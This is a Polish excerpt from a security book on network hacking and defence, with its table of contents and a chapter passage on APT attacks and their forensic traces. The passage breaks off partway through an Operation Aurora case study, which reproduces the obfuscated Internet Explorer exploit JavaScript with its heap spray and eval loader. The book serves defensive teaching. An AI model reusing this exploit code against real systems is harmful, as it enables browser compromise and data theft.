Darmowy fragment publikacji:
Tytuł oryginalny: Hacking Exposed™ 7: Network Security Secrets Solutions, Seventh Edition
Tłumaczenie: Tomasz Walczak
ISBN: 978-83-246-6867-0
Original edition copyright © 2012 by The McGraw-Hill Companies.
All rights reserved.
Polish edition copyright © 2013 by HELION SA
All rights reserved.
All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means,
electronic or mechanical, including photocopying, recording or by any information storage retrieval system,
without permission from the Publisher.
Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej
publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną,
fotograficzną, a także kopiowanie książki na nośniku filmowym, magnetycznym lub innym powoduje
naruszenie praw autorskich niniejszej publikacji.
Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich
właścicieli.
Wydawnictwo HELION dołożyło wszelkich starań, by zawarte w tej książce informacje były kompletne
i rzetelne. Nie bierze jednak żadnej odpowiedzialności ani za ich wykorzystanie, ani za związane z tym
ewentualne naruszenie praw patentowych lub autorskich. Wydawnictwo HELION nie ponosi również
żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce.
Wydawnictwo HELION
ul. Kościuszki 1c, 44-100 GLIWICE
tel. 32 231 22 19, 32 230 98 63
e-mail: helion@helion.pl
WWW: http://helion.pl (księgarnia internetowa, katalog książek)
Pliki z przykładami omawianymi w książce można znaleźć pod adresem:
ftp://ftp.helion.pl/przyklady/wszyha.zip
Drogi Czytelniku!
Jeżeli chcesz ocenić tę książkę, zajrzyj pod adres
http://helion.pl/user/opinie/wszyha
Możesz tam wpisać swoje uwagi, spostrzeżenia, recenzję.
Printed in Poland.
• Kup książkę
• Poleć książkę
• Oceń książkę
• Księgarnia internetowa
• Lubię to! » Nasza społeczność
SPIS TRE¥CI
O autorach ........................................................................................................................11
O współautorach ..............................................................................................................13
O recenzentach technicznych ........................................................................................17
Przedmowa .......................................................................................................................19
Wprowadzenie .................................................................................................................23
CzÚĂÊ I Badanie Ărodowiska
Studium przypadku .........................................................................................................28
Najważniejsza jest anonimowość, głupcze! ..................................................28
Tor-turowanie niewinnych .............................................................................29
T 1. Footprinting .............................................................................................................33
Czym jest footprinting? ..................................................................................................34
Dlaczego footprinting jest niezbędny? ..........................................................35
Footprinting internetu ....................................................................................................35
Krok 1. Ustalenie zakresu działań ..................................................................35
Krok 2. Zadbaj o odpowiednie uprawnienia ................................................37
Krok 3. Publicznie dostępne informacje .......................................................37
Krok 4. WHOIS i wyliczanie DNS .................................................................55
Krok 5. Badanie nazw DNS ............................................................................64
Krok 6. Rekonesans sieci .................................................................................71
Podsumowanie .................................................................................................................75
T 2. Skanowanie ............................................................................................................77
Ustalanie, czy system jest aktywny ................................................................................78
Odkrywanie hostów za pomocą protokołu ARP .........................................79
Odkrywanie hostów z wykorzystaniem protokołu ICMP ..........................81
Odkrywanie hostów za pomocą protokołów TCP i UDP ..........................86
Kup książkęPoleć książkę6
Vademecum hackingu. Skuteczna obrona sieci przed atakami
Ustalanie, które usługi działają lub oczekują na pakiety ............................................92
Rodzaje skanowania ........................................................................................93
Identyfikowanie działających usług TCP i UDP .........................................95
Wykrywanie systemu operacyjnego ............................................................................103
Identyfikowanie systemu na podstawie dostępnych portów ...................104
Aktywny fingerprinting stosu ......................................................................105
Pasywny fingerprinting stosu .......................................................................109
Przetwarzanie i przechowywanie danych ze skanowania ........................................111
Zarządzanie danymi ze skanowania za pomocą Metasploita ..................112
Podsumowanie ...............................................................................................................114
T 3. Wyliczanie ............................................................................................................115
Fingerprinting usług .....................................................................................................117
Skanery luk .....................................................................................................................119
Proste przechwytywanie banerów ...............................................................................122
Wyliczanie popularnych usług sieciowych ................................................................125
Podsumowanie ...............................................................................................................193
CzÚĂÊ II Hakowanie punktów koñcowych i serwera
Studium przypadku — międzynarodowa intryga .....................................................196
T 4. Hakowanie systemu Windows ...............................................................................199
Przegląd ...........................................................................................................................201
Co zostało pominięte w tym rozdziale? ......................................................202
Ataki bez uwierzytelniania ...........................................................................................202
Ataki przez fałszowanie danych uwierzytelniających ...............................203
Zdalne ataki bez uwierzytelniania ...............................................................221
Ataki z uwierzytelnianiem ............................................................................................229
Zwiększanie uprawnień .................................................................................229
Zdobywanie i łamanie haseł .........................................................................231
Zdalna kontrola i „furtki” .............................................................................247
Przekierowywanie portów ............................................................................252
Zacieranie śladów ...........................................................................................254
Ogólne zabezpieczenia przed atakami z uwierzytelnianiem ....................257
Funkcje bezpieczeństwa w systemie Windows ..........................................................262
Zapora systemu Windows ............................................................................262
Automatyczne aktualizacje ...........................................................................262
Centrum zabezpieczeń ..................................................................................263
Zasady zabezpieczeń i zasady grupy ............................................................264
Microsoft Security Essentials ........................................................................267
Pakiet EMET ...................................................................................................267
Bitlocker i system EFS ...................................................................................267
Windows Resource Protection .....................................................................269
Kup książkęPoleć książkęSpis treĂci
7
Poziomy integralności, kontrola konta użytkownika i tryb PMIE .........270
Funkcja DEP (ang. Data Execution Prevention) .......................................273
Windows Service Hardening ........................................................................273
Rozszerzenia związane z kompilatorem .....................................................278
Zakończenie — ciężar zabezpieczania systemu Windows .......................279
Podsumowanie ...............................................................................................................279
T 5. Hakowanie systemu UNIX ......................................................................................283
Przejmowanie konta administratora ..........................................................................284
Krótkie wprowadzenie ..................................................................................285
Mapowanie luk ...............................................................................................285
Dostęp zdalny a dostęp lokalny ....................................................................286
Dostęp zdalny .................................................................................................................287
Ataki oparte na danych .................................................................................292
Gdzie jest moja powłoka? .............................................................................310
Popularne typy zdalnych ataków .................................................................315
Dostęp lokalny ...............................................................................................................335
Po włamaniu na konto administratora .......................................................................353
Przywracanie stanu po ataku rootkita .........................................................369
Podsumowanie ...............................................................................................................370
T 6. CyberprzestÚpstwa i ataki APT ...............................................................................373
Czym jest atak APT? .....................................................................................................375
Operacja Aurora .............................................................................................379
Grupa Anonymous ........................................................................................382
RBN ..................................................................................................................383
Czym ataki APT NIE są? ..............................................................................................384
Przykładowe popularne narzędzia i techniki z obszaru APT ..................................384
Typowe oznaki ataków APT ........................................................................................424
Podsumowanie ...............................................................................................................430
CzÚĂÊ III Hakowanie infrastruktury
Studium przypadku — WEP-owe przygody ..............................................................432
T 7. Zdalna komunikacja i hakowanie poïÈczeñ VoIP .....................................................437
Przygotowania do dzwonienia .....................................................................................439
Wardialing ......................................................................................................................441
Sprzęt ...............................................................................................................441
Kwestie prawne ..............................................................................................443
Dodatkowe koszty ..........................................................................................443
Oprogramowanie ...........................................................................................444
Kup książkęPoleć książkę8
Vademecum hackingu. Skuteczna obrona sieci przed atakami
Skrypty do przeprowadzania ataków siłowych — nasz sposób ..............................459
Końcowe uwagi na temat skryptów do przeprowadzania
ataków siłowych ..........................................................................................470
Hakowanie systemów PBX ...........................................................................................472
Hakowanie poczty głosowej .........................................................................................476
Hakowanie sieci VPN ...................................................................................................482
Wprowadzenie do sieci VPN IPSec .............................................................483
Hakowanie sieci VPN opartych na oprogramowaniu firmy Citrix ........489
Ataki na technologię VoIP ...........................................................................................510
Atakowanie sieci VoIP ..................................................................................511
Podsumowanie ...............................................................................................................533
T 8. Hakowanie sieci bezprzewodowych .......................................................................535
Wprowadzenie ...............................................................................................................537
Częstotliwości i kanały ..................................................................................537
Nawiązywanie sesji ........................................................................................538
Mechanizmy zabezpieczeń ...........................................................................539
Wyposażenie ..................................................................................................................541
Bezprzewodowe karty sieciowe ....................................................................542
Systemy operacyjne ........................................................................................543
Różne narzędzia .............................................................................................544
Odkrywanie i monitorowanie ......................................................................................546
Znajdowanie sieci bezprzewodowych .........................................................546
Podsłuchiwanie danych w sieciach bezprzewodowych ............................550
Ataki przez odmowę usługi ..........................................................................................552
Ataki na sieci z obsługą szyfrowania ...........................................................................553
WEP .................................................................................................................554
Ataki na sieci z uwierzytelnianiem ..............................................................................558
WPA-PSK .......................................................................................................559
WPA Enterprise .............................................................................................564
Podsumowanie ...............................................................................................................569
T 9. Hakowanie sprzÚtu ................................................................................................571
Dostęp fizyczny — przedostawanie się przez drzwi .................................................572
Hakowanie urządzeń .....................................................................................................579
Konfiguracje domyślne .................................................................................................584
Podatny na atak od wyjęcia z pudełka ........................................................584
Standardowe hasła .........................................................................................584
Bluetooth .........................................................................................................585
Inżynieria wsteczna sprzętu .........................................................................................585
Odwzorowywanie urządzenia ......................................................................586
Podsłuchiwanie danych przesyłanych magistralą .....................................590
Kup książkęPoleć książkęSpis treĂci
9
Podsłuchiwanie interfejsu bezprzewodowego ...........................................592
Inżynieria wsteczna firmware’u ...................................................................594
Emulatory sprzętowe .....................................................................................599
Podsumowanie ...............................................................................................................602
CzÚĂÊ IV Hakowanie aplikacji i danych
T 10. Hakowanie aplikacji sieciowych i baz danych .........................................................607
Hakowanie serwerów WWW ......................................................................................608
Przykładowe pliki ...........................................................................................610
Ujawnienie kodu źródłowego ......................................................................611
Ataki związane z przekształcaniem na postać kanoniczną ......................611
Rozszerzenia serwerów .................................................................................612
Przepełnienie bufora ......................................................................................615
Odmowa usługi ..............................................................................................616
Skanery luk serwerów WWW ......................................................................617
Hakowanie aplikacji sieciowych ..................................................................................618
Znajdowanie podatnych na atak aplikacji sieciowych
za pomocą wyszukiwarki Google (Googledorks) ...................................619
Przeszukiwanie sieci WWW .........................................................................621
Ocenianie aplikacji sieciowych ....................................................................623
Luki często występujące w aplikacjach sieciowych ...................................................636
Hakowanie baz danych .................................................................................................651
Wykrywanie baz danych ...............................................................................652
Luki w bazach danych ...................................................................................653
Inne uwagi .......................................................................................................668
Podsumowanie ...............................................................................................................670
T 11. Hakowanie rozwiÈzañ mobilnych ...........................................................................671
Hakowanie Androida ....................................................................................................673
Wprowadzenie do Androida ........................................................................675
Hakowanie własnych urządzeń z Androidem ...........................................681
Hakowanie cudzych urządzeń z Androidem .............................................698
Android jako przenośna platforma do hakowania ....................................720
Zabezpieczanie urządzeń z Androidem ......................................................723
System iOS ......................................................................................................................725
Poznaj swojego iPhone’a ...............................................................................726
Jak bezpieczny jest system iOS? ...................................................................728
Jailbreaking — uwolnij moc! ........................................................................729
Hakowanie cudzych iPhone’ów — uwolniona moc! ................................735
Podsumowanie ...............................................................................................................753
Kup książkęPoleć książkę10
Vademecum hackingu. Skuteczna obrona sieci przed atakami
T 12. KsiÚga zabezpieczeñ .............................................................................................755
Ogólne strategie .............................................................................................................757
Przenoszenie i usuwanie zasobów ...............................................................758
Podział zadań ..................................................................................................758
Uwierzytelnianie, autoryzacja i inspekcja ...................................................760
Stosowanie warstw .........................................................................................761
Dynamiczne wzbogacanie ............................................................................762
Kontrolowane awarie ....................................................................................763
Zasady i szkolenia ..........................................................................................763
Proste, tanie i łatwe ........................................................................................764
Przykładowe scenariusze ..............................................................................................765
Scenariusze związane z komputerami stacjonarnymi ...............................765
Scenariusze związane z serwerem ................................................................766
Scenariusze związane z siecią .......................................................................772
Scenariusze związane z aplikacjami sieciowymi i bazami danych ..........774
Scenariusze związane z rozwiązaniami mobilnymi ...................................775
Podsumowanie ...............................................................................................................776
Dodatki
T A Porty ....................................................................................................................781
T B DziesiÚÊ najwaĝniejszych luk bezpieczeñstwa ........................................................789
T C Odmowa usïugi i rozproszone ataki przez odmowÚ usïugi .......................................793
Zabezpieczenia ...............................................................................................................797
T S Skorowidz .............................................................................................................801
Kup książkęPoleć książkęROZDZIA 6.
CyberprzestÚpstwa
i ataki APT
Kup książkęPoleć książkę374
Vademecum hackingu. Skuteczna obrona sieci przed atakami
P
ojęcie APT (ang. Advanced Persistant Threats) ostatnio znacznie zyskało na
popularności. APT oznacza powtarzający się nieuwierzytelniony dostęp do
korporacyjnych sieci. Określenie to trafiło na nagłówki gazet i było powodem
wielu bezsennych nocy licznych informatyków odpowiedzialnych za bezpieczeństwo.
Jednak samo zagadnienie nie jest niczym nowym. Jeśli byłeś jednym ze szczęściarzy,
którzy w 1999 roku kupili pierwsze wydanie książki Hacking Exposed, i otworzyłeś
tylną okładkę, mogłeś zobaczyć schemat zatytułowany Anatomy of a Hack. Pokazano
na nim prosty proces metodycznego namierzania i atakowania sieci przez hakerów.
Choć na diagramie nie przedstawiono eksploitów typu zero-day, omówiono je szcze-
gółowo w tekście książki. Opis ten w połączeniu ze schematem Anatomy of a Hack
był zapowiedzią tego, co później nazwano atakami APT.
Obecnie pojęcie APT stosuje się często niepoprawnie, określając tym mianem
popularne szkodliwe oprogramowanie, np. robaki i trojany oparte na skomplikowa-
nych technikach lub zaawansowanych rozwiązaniach programistycznych, które pozwa-
lają napastnikom ominąć programy antywirusowe i inne aplikacje zabezpieczające
oraz działają w systemie przez długi czas. W rzeczywistości ataki APT polegają na
zastosowaniu przez hakera zaawansowanych narzędzi do włamania się do systemu,
przy czym mają pewną dodatkową cechę — są przeprowadzane w jakimś ważnym
celu. Większość hakerów chce uzyskać dostęp do systemu, wykonać zaplanowane
operacje i usunąć określone dane. W atakach APT celem jest wykorzystywanie systemu
przez długi czas. Pamiętaj jednak, że atak APT nie musi być ani zaawansowany (ang.
advanced), ani trwały (ang. persistent).
Ataki APT są przeciwieństwem oportunistycznych włamań popularnych na
początku obecnego wieku (wykorzystywano w nich techniki w rodzaju hakowania za
pomocą zapytań do wyszukiwarki, tzw. Google hacking, pozwalających znaleźć nie-
zabezpieczone maszyny). Ataki APT są zaplanowane, wymierzone w konkretny cel
i prowadzone przez zorganizowane grupy oraz mają przynieść określone skutki (w tym
stały dostęp). Wykrycie konkretnych narzędzi często pozwala podejrzewać, że ma miej-
sce atak APT (choć nie daje takiej pewności), ponieważ różni napastnicy stosują
w trakcie działań podobne pakiety. Może to pomóc powiązać zagrożenie z konkretną
grupą.
Na ogólnym poziomie ataki APT można podzielić na dwie kategorie w zależności
od zamiarów napastników. Pierwsza grupa koncentruje się na działalności przestęp-
czej i jest zainteresowana danymi osobowymi oraz (lub) finansowymi, a także posia-
danymi przez firmy informacjami, które można wykorzystać do podszywania się,
oszustw finansowych lub kradzieży. Druga grupa zajmuje się wywiadem gospodar-
czym lub szpiegostwem na rzecz państw (czasem obszary te zachodzą na siebie).
W ramach tych działań są przejmowane zastrzeżone i zwykle niedostępne publicznie
informacje, np. własność intelektualna i tajemnice handlowe. Pozwala to wprowadzać
Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
375
na rynek konkurencyjne produkty i usługi oraz projektować strategie rywalizacji
z okradzionymi firmami lub reagowania na możliwości tych organizacji.
Ataki APT mogą być wymierzone w organizacje społeczne, polityczne, rządowe
lub przemysłowe — i często są. Informacje dają władzę, a dostęp do danych na temat
konkurencji i kontrolowanie ich zapewnia dużo możliwości. To właśnie jest ostateczny
cel ataków APT — zdobyć i utrzymać dostęp do ważnych dla napastników informacji.
Niezależnie od tego, czy działania są prowadzone w ramach wspieranego przez pań-
stwo szpiegostwa przemysłowego lub zorganizowanej przestępczości, czy przez nie-
zadowolone grupy społeczne, metody i techniki ataków APT są bardzo podobne,
dlatego można je rozpoznać i odróżnić od przypadkowych infekcji komputerów szko-
dliwym oprogramowaniem.
Warto powtórzyć ten ważny punkt — ataki APT to nie szkodliwe oprogramo-
wanie. W wielu sytuacjach napastnicy nawet nie stosują oprogramowania tego rodzaju,
przy czym niektórzy hakerzy lubią posługiwać się pewnymi narzędziami, co pomaga
analitykom i śledczym powiązać ataki z określonymi grupami (a także znaleźć pozo-
stałości i dowody operacji wielokrotnie przeprowadzanych przez napastników). Ataki
APT to działania prowadzone przez zorganizowaną grupę w celu uzyskania (trwałego)
dostępu do konkretnego systemu i kradzieży informacji dla potrzeb finansowych,
społecznych, przemysłowych, politycznych lub konkurencyjnych.
CZYM JEST ATAK APT?
Pojęcie Advanced Persistent Threat (APT; zaawansowane trwałe zagrożenie) zostało
utworzone przez analityków z amerykańskich Sił Powietrznych w 2006 roku. Opisuje
ono trzy aspekty ataków związane z profilem, zamiarami i strukturą grupy napastników.
x Zaawansowane. Napastnik jest biegły w metodach cyberataków i technikach
administracyjnych. Potrafi rozwijać niestandardowe eksploity i narzędzia.
x Trwałe. Napastnik ma długoterminowe cele i stara się je osiągnąć, unikając
x Zagrożenie. Napastnicy są zorganizowani, mają duże środki, motywację
przy tym wykrycia.
i możliwości.
Ataki APT, jak wcześniej wspomnieliśmy, to działania zorganizowanej grupy,
która ma nieuwierzytelniony dostęp do systemów informacyjnych i łączy komuni-
kacyjnych oraz może nimi manipulować. Celem jest kradzież cennych informacji,
które można wykorzystać w różny sposób. Ataki APT są związane ze szpiegostwem,
wywiadem gospodarczym i brudnymi sztuczkami. Są formą szpiegostwa, która daje
dostęp do cyfrowych zasobów. Napastnicy starają się usunąć przeszkody na drodze
do uzyskania tego dostępu, dlatego rzadko uciekają się do sabotażu. Hakerzy mogą
jednak posługiwać się różnymi technikami zacierania śladów działań w dziennikach
Kup książkęPoleć książkę376
Vademecum hackingu. Skuteczna obrona sieci przed atakami
systemowych i mogą nawet uszkodzić system operacyjny lub system plików. Narzę-
dzia APT różnią się od innego szkodliwego oprogramowania, ponieważ wykorzystują
normalne funkcje systemu operacyjnego i są widoczne w systemie plików.
Grupy przeprowadzające ataki APT nie chcą, aby ofiara wykryła wykorzystywane
przez nie narzędzia lub techniki. Dlatego nie chcą blokować ani zakłócać normalnego
działania systemu w atakowanych hostach. Zamiast tego stosują dyskretne techniki
ataku, penetracji, rekonesansu, poruszania się w poziomie, administrowania i wypro-
wadzania danych. Techniki te zazwyczaj odzwierciedlają podobne administracyjne
lub operacyjne działania atakowanej firmy, choć odkryto, że niektóre grupy stosują
w swoich operacjach konkretne narzędzia. W niektórych sytuacjach ataki APT pomo-
gły zaatakowanym firmom (nieświadomie) zabezpieczyć systemy przed szkodliwym
oprogramowaniem lub atakami APT ze strony innych grup.
Choć stosowane techniki są dyskretne, nie dotyczy to pozostałości po przepro-
wadzonych działaniach. Np. najpopularniejszą metodą uzyskiwania dostępu do doce-
lowych sieci w atakach APT jest ukierunkowany phising (ang. spear-phishing). Tech-
nika ta jest oparta na e-mailach, dlatego — często w wielu miejscach — pozostają
ślady po wiadomościach, zastosowanej metodzie ataku oraz adresach i protokołach
wykorzystywanych do komunikowania się z komputerami napastników. E-maile prze-
syłane w ukierunkowanym phishingu mogą obejmować szkodliwe oprogramowanie,
które próbuje zaatakować aplikacje z komputera użytkownika. Mogą też kierować
użytkownika (na podstawie pewnych informacji identyfikujących jego tożsamość) na
serwer udostępniający niestandardowe szkodliwe oprogramowanie, które umożliwia
hakerom dalsze działania w ramach ataku APT.
Napastnicy zwykle wykorzystują wcześniej przejęte sieci komputerów jako pod-
stawione systemy, aby ukryć się za nimi, gdy przesyłają instrukcje i sterują atakiem.
Jednak adresy podstawionych serwerów mogą okazać się ważnymi poszlakami pomoc-
nymi przy ustalaniu tożsamości danej grupy. Także systemy pocztowe używane do
ukierunkowanego phishingu, a nawet stosowane eksploity (zwykle programy do insta-
lowania trojanów — ang. trojan dropper) mogą działać w modelu „płatności za insta-
lację” lub „leasingu”. Mimo to podobne adresy, metody i eksploity w połączeniu
z innymi informacjami ustalonymi w trakcie śledztwa często pozwalają powiązać
z atakiem konkretne grupy.
Inne popularne techniki stosowane w atakach APT to wstrzykiwanie kodu w SQL-u
w docelowych witrynach, posługiwanie się „metaeksploitami” serwerów WWW, phish-
ingiem, eksploitami aplikacji używanych w sieciach społecznościowych, a także stan-
dardowe metody z obszaru inżynierii społecznej, np. podawanie się za użytkownika
w rozmowach z pomocą techniczną, podrzucanie zainfekowanych pendrive’ów, roz-
dawanie zainfekowanego sprzętu lub oprogramowania, a w skrajnych przypad-
kach tradycyjne szpiegowanie przez zwykłych lub kontraktowych pracowników. Ataki
APT zawsze obejmują pewne aspekty inżynierii społecznej. Inżynieria społeczna —
Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
377
niezależnie od tego, czy ogranicza się do korzystania z adresów e-mail z publicznych stron
internetowych, czy polega na szpiegostwie korporacyjnym przez pracowników kon-
traktowych — pozwala poznać cel i pomaga napastnikom opracować strategie dostępu
do docelowych systemów operacyjnych, wykorzystania luk i wydobycia danych.
Ataki APT zawsze obejmują kilka etapów, po których pozostają ślady. Oto te fazy:
1. Namierzanie. Napastnicy zbierają informacje o celu ze źródeł publicznych lub
prywatnych i sprawdzają metody, które mogą pomóc w uzyskaniu dostępu.
Posługują się przy tym skanowaniem luk (przez testy bezpieczeństwa aplikacji
i ataki typu DDoS), inżynierią społeczną lub ukierunkowanym phishingiem.
Celem może być konkretna firma lub jej partner (który może umożliwić pośredni
dostęp do docelowej organizacji przez sieci biznesowe).
2. Uzyskanie dostępu i włamanie. Napastnicy uzyskują dostęp i ustalają
najwydajniejsze lub najskuteczniejsze metody wykorzystania systemów
informacyjnych i stanu zabezpieczeń docelowej organizacji. Na tym etapie
określają dane identyfikacyjne zaatakowanego hosta (adres IP, nazwę DNS,
wyliczone udziały NetBIOS-a, adresy serwerów DNS i DHCP, system
operacyjny itd.), a także w miarę możliwości zbierają dane uwierzytelniające
i profile, co pomaga w dalszych włamaniach. Napastnicy mogą próbować ukryć
swoje zamiary, instalując programy typu rogueware lub inne szkodliwe
oprogramowanie.
3. Rekonesans. Napastnicy wyliczają udziały sieciowe, odkrywają architekturę
sieci, usługi tłumaczenia nazw, kontrolery domeny, a także sprawdzają,
czy usługi i administrator mają uprawnienia dostępu do innych systemów
i aplikacji. Hakerzy mogą próbować włamać się na konta Active Directory
lub lokalnych administratorów z uprawnieniami do domeny. Napastnicy często
starają się ukryć działania przez wyłączenie programu antywirusowego
i dzienników systemowych (zjawiska te mogą wskazywać na włamanie).
4. Poruszanie się w poziomie. Gdy napastnicy ustalili już sposoby poruszania
się po systemach za pomocą danych uwierzytelniających oraz zidentyfikowali
cele (łatwe do zaatakowania lub dostosowane do zamiarów), zaczynają
przechodzić w poziomie do innych hostów z sieci. Etap ten nie wymaga
stosowania szkodliwego oprogramowania ani specjalnych aplikacji. Wystarczą
rozwiązania dostępne w systemach operacyjnych przejętych hostów, np. powłoka
poleceń, instrukcje NetBIOS-a, usługi terminalowe systemu Windows, sieci
VNC lub inne podobne narzędzia używane przez administratorów sieci.
5. Zbieranie i wyprowadzanie danych. Napastników interesują informacje —
niezależnie od tego, czy służą do dalszego namierzania ofiar, utrzymania dostępu
lub innych celów, hakerzy chcą zdobyć i ukraść dane. Napastnicy często tworzą
„punkty zbierania danych” i wyprowadzają informacje za pomocą
podstawionych sieci pośredniczących. Czasem stosuje się też niestandardowe
Kup książkęPoleć książkę378
Vademecum hackingu. Skuteczna obrona sieci przed atakami
techniki szyfrowania (i szkodliwe oprogramowanie), aby utrudnić zrozumienie
plików danych i powiązanych połączeń, przez które są wyprowadzane
informacje. W wielu sytuacjach napastnicy wykorzystują istniejące
oprogramowanie do tworzenia kopii zapasowych i inne narzędzia
administracyjne, którymi posługują się administratorzy sieci i systemów
w zaatakowanej organizacji. Wyprowadzanie danych odbywa się fragment
po fragmencie lub w dużych porcjach. Zależy to od tego, czy napastnikowi
się spieszy i czy jego zdaniem firma potrafi wykryć kradzież danych.
6. Administrowanie i konserwacja narzędzi. Innym celem w atakach APT jest
utrzymanie dostępu. Wymaga to administrowania narzędziami (szkodliwym
oprogramowaniem i potencjalnie niepożądanymi lub przydatnymi programami,
np. pakietem Sysinternals) i danymi uwierzytelniającymi oraz ich
konserwowania. Napastnicy przygotowują kilka różnych dróg zdalnego dostępu
do sieci oraz tworzą flagi i wyzwalacze informujące o zmianach w architekturze
systemu. Pozwala to na podjęcie odpowiednich działań, takich jak namierzanie
nowych celów i włamywanie się do nich, a także przeprowadzanie pozornych
ataków z wykorzystaniem szkodliwego oprogramowania, aby odwrócić uwagę
pracowników firmy. Napastnicy zwykle próbują usprawniać metody dostępu,
by były jak najbardziej zbliżone do działań standardowych użytkowników.
Niepożądane jest ciągłe poleganie na specjalnych narzędziach i szkodliwym
oprogramowaniu.
Jak wspomnieliśmy, po próbach dostępu mogą pozostać e-maile, wpisy w dzien-
nikach serwera WWW i na ścieżkach komunikacyjnych oraz inne ślady związane
z zastosowanymi technikami. Także rekonesans i poruszanie się w poziomie pozo-
stawiają artefakty wynikające z nadużywania danych uwierzytelniających (reguł)
lub tożsamości (ról). Zwykle ślady te znajdują się w dziennikach zdarzeń z obszaru
bezpieczeństwa i dziennikach historii aplikacji. Wyprowadzanie danych pozostawia
artefakty związane z protokołami i adresami w dziennikach zapory, w dziennikach
systemów IDS (na poziomie hostów i sieci), dziennikach systemu zapobiegania wycie-
kaniu danych, dziennikach historii aplikacji oraz dziennikach serwerów WWW.
Wspomniane ślady zwykle są dostępne w aktywnych systemach plików (jeśli admi-
nistrator wie, gdzie i czego szukać), jednak czasem można je odkryć tylko w ramach
sądowych badań zaatakowanych systemów.
Techniki stosowane w atakach APT zasadniczo nie różnią się od technik admi-
nistracyjnych i operacyjnych używanych w korporacyjnych systemach informatycz-
nych. Dlatego nieuprawniony napastnik pozostawia w systemie plików i innych dzien-
nikach te same ślady co upoważniony użytkownik. Jednak nieuprawnione osoby muszą
przeprowadzać eksperymenty lub korzystać z dodatkowych narzędzi, aby uzyskać
dostęp i wykorzystać system. Dlatego pozostają po nich pewne anomalie, które nie
występują w danych dotyczących uprawnionych użytkowników.
Kup książkęPoleć książkęRozdziaï 6. CyberprzestÚpstwa i ataki APT
379
W ostatnich pięciu latach wykryto kilka długotrwałych ataków APT przeprowa-
dzonych przez nieznanych sprawców na różne jednostki przemysłowe i rządkowe
z całego świata. Ataki te otrzymały nazwy nadane przez śledczych (Aurora, Nitro,
ShadyRAT, Lurid, Night Dragon, Stuxnet i DuQu). Każda z akcji obejmowała dzia-
łania operacyjne, w tym dostęp, rekonesans, poruszanie się w poziomie, manipulo-
wanie systemami informatycznymi i wyprowadzanie prywatnych lub zastrzeżonych
danych. W trzech następnych podpunktach omawiamy trzy ataki APT.
Operacja Aurora
Popularność
Łatwość przeprowadzenia
Szkodliwość
Ocena zagrożenia
1
1
10
4
W 2009 roku amerykańskie firmy z branży technologicznej i zbrojeniowej stały się
ofiarą włamania do sieci oraz systemów zarządzania konfiguracją oprogramowania.
Doprowadziło to do kradzieży wysoce poufnych informacji. Z firm Google, Juniper,
Adobe i przynajmniej 29 innych przez aż sześć miesięcy wyciekały tajemnice han-
dlowe i ważne dla konkurencji dane. Dopiero wtedy organizacje wykryły kradzież
i podjęły działania w celu powstrzymania ataku APT.
Napastnicy uzyskali dostęp do sieci ofiar za pomocą e-maili z ukierunkowanym
phishingiem wysyłanych do pracowników firm. E-maile te obejmowały odnośnik do
tajwańskiej witryny, w której znajdował się szkodliwy kod w JavaScripcie. Gdy odbiorca
wiadomości kliknął odnośnik i otworzył witrynę, kod wykorzystywał lukę w przeglą-
darce Internet Explorer, co pozwalało na zdalne wykonywanie kodu przez dostęp do
częściowo zwolnionej pamięci. Szkodliwy kod nie był wykrywany przez programy
antywirusowe. Działał przez wstrzykiwanie kodu powłoki z następującymi instrukcjami:
html script var sc = unescape( u9090 ... ... ubcb9 ub2f6 ubfa8 u00d8 );
var sss = Array(826, 679, ... ...735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i sss.length; i ++){
arr[i] = String.fromCharCode(sss[i]/7); }
var cc=arr.toString();cc=cc.replace(/ ,/ g, );
cc = cc.replace(/@/g, , );
eval(cc);
var xl = new Array();
for (i = 0; i 200; i ++){
xl[i] = document.createElement( COMMENT );
xl[i].data = abc ;
};
var el = null;
Kup książkęPoleć książkę380
Vademecum hackingu. Skuteczna obrona sieci przed atakami
function ev1(evt){
el = document.createEventObject(evt);
document.getElementById( sp1 ).innerHTML = ;
windows.setInterval(ev2, 50);
}
function ev2(){
p =
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c
0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\\u0c0d\
u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\\u0c0d\u0c
0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\
u0c0d ;
for (i = 0; i xl.length; i ++ ){
xl[i].data = p;
};
var t = el.srcElement;
}
/script span id= sp1 IMG SRC= aaa.gif onload= evl(event)
/span /body /html
W javascriptowym eksploicie wykorzystano prostą procedurę obliczania sumy CRC
(ang. Cyclic Redundancy Checking) z 16 stałymi. Przedstawiono ją poniżej.
unsigned cal_crc(unsigned char *ptr, unsigned char len) {
unsigned int crc;
unsigned char da;
unsigned int crc_ta[16]={
0x0000,0x1021,0x2042,0x3063,0x4084,0x50a5,0x60c6,0x70e7,
0x8108,0x9129,0xa14a,0xb16b,0xc18c,0xd1ad,0xe1ce,0xf1ef,
}
crc=0;
while(len--!=0) {
da=((uchar)(crc/256))/16;
crc =4;
crc^=crc_ta[da^(*ptr/16)];
da=((uchar)(crc/256))/16;
crc =4;
crc^=crc_ta[da^(*ptr 0x0f)];
ptr++;
}
return(crc);
}
Niektórzy analitycy uważają, że kod metody wskazuje na to, iż jej autorem jest
chińskojęzyczny programista. Pomysł ten oparto na dwóch ważnych odkryciach:
(1) kod obliczania sumy CRC przypuszczalnie pochodzi z pracy opublikowanej
w uproszczonym chińskim; (2) sześć umieszczonych w kodzie powiązanego trojana
adresów IP, z których wysyłano instrukcje i kontrolowano system, służyło do uzy-
skiwania zdalnego dostępu i zarządzania przejętymi komputerami połączonymi
